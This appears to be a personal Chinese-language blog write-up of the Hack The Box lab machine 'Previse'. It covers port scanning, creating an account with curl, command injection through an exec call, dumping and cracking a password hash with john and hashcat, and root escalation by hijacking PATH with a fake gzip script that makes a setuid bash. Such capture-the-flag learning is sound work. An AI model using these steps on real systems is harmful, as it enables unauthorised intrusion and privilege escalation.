SugarCrash!

记录学习,想找个师傅带带我

0%

Previse

wp
https://davidguest.uk/hack-the-box-previse/
https://hackhouse.net/htb-previse/

收集

1
2
3
老惯例,nmap 
nmap -v -sSV -p 22,80 -Pn 10.10.11.104 -T4 -oA nmap/sSV
感觉免费的简单靶场都是22 和 80


页面打开是这么个玩意儿

目录扫描没扫出什么东西

1
2
3
4
5
6
7
使用 curl 时,可以从 webapp 获取真正的响应页面,因为 curl 默认不遵循重定向。 
curl使用参考,使用的好直接取代postman工具 http://www.ruanyifeng.com/blog/2019/09/curl-reference.html
curl -is -X GET 10.10.11.104/index.php

-i 参数打印出服务器回应的 HTTP 标头。
-s 参数将不输出错误和进度信息。
-X 指定使用 GET 模式访问

访问一下10.10.11.104/accounts.php curl -is -X http://10.10.11.104/account.php
发现了3个表单,提交数据 并且说了用户名和密码在5-32个字符之间

-d POST 发送有参数的 POST 请求

用curl提交post请求访问一下 curl -is -X POST -d “username=hacker&password=hacker&confirm=hacker” 10.10.11.104/accounts.php 成功登陆。

到这感觉怪怪的

开始翻网站,翻到一个像是被注入过的一个日志文件

file目录下有一个上传和一个上传文件的下载
backup,备份,网站备份文件,打开,干他
看备份文件就看config,db,这类的

解压文件
unzip siteBackup.zip

像是网站备份文件
config.php 是一个数据库配置文件,可以尝试连一下ssh

无果

没啥用,继续翻文件logs.php(当然是看wp的) 看到一个exec命令执行的函数


&& 连接一个反弹shell的命令


连接成功,是个低权限的 ls 没有要找到的user root flag
但是/home/下有一个用户m4lwhere,下面有一个user.txt,需要m4lwhere权限才能访问
前面拿到数据库配置的文件,看能不能再数据库里面找到m4lwhere的hash 用hashcat 爆一下
写一个脚本导出里面的hash值


echo ‘<上面的代码>’ >> status.php里
curl 10.10.11.104/status.php 访问那个文件,成功读到了他的hash

1
2
john 
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long

1
2
hashcat 
hashcat hash.txt /usr/share/wordlists/rockyou.txt -m 500


ssh连接拿到第一个user.txt

提权

sudo -l 看到一个access_backup.sh的root文件

1
2
3
4
5
6
7
8
9
10
cd /tmp
cat << EOF > gzip
> #!/bin/bash
> cp /bin/bash /tmp/c
> chmod u+s /tmp/c
> EOF
chmod +x gzip export PATH=$( pwd ):$PATH

sudo /opt/scripts/access_backup.sh
./c -p

总结

进web有点蒙,提权有点蒙